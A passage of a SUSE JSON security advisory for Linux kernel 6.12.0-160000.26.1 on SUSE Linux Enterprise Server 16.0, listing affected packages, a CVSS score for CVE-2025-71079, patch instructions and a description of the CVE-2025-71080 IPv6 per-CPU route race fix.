"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71079",
"url": "https://www.suse.com/security/cve/CVE-2025-71079"
},
{
"category": "external",
"summary": "SUSE Bug 1256619 for CVE-2025-71079",
"url": "https://bugzilla.suse.com/1256619"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71079"
},
{
"cve": "CVE-2025-71080",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71080"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: fix a BUG in rt6_get_pcpu_route() under PREEMPT_RT\n\nOn PREEMPT_RT kernels, after rt6_get_pcpu_route() returns NULL, the\ncurrent task can be preempted. Another task running on the same CPU\nmay then execute rt6_make_pcpu_route() and successfully install a\npcpu_rt entry. When the first task resumes execution, its cmpxchg()\nin rt6_make_pcpu_route() will fail because rt6i_pcpu is no longer\nNULL, triggering the BUG_ON(prev). It\u0027s easy to reproduce it by adding\nmdelay() after rt6_get_pcpu_route().\n\nUsing preempt_disable/enable is not appropriate here because\nip6_rt_pcpu_alloc() may sleep.\n\nFix this by handling the cmpxchg() failure gracefully on PREEMPT_RT:\nfree our allocation and return the existing pcpu_rt installed by\nanother task. The BUG_ON is replaced by WARN_ON_ONCE for non-PREEMPT_RT\nkernels where such races should not occur.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
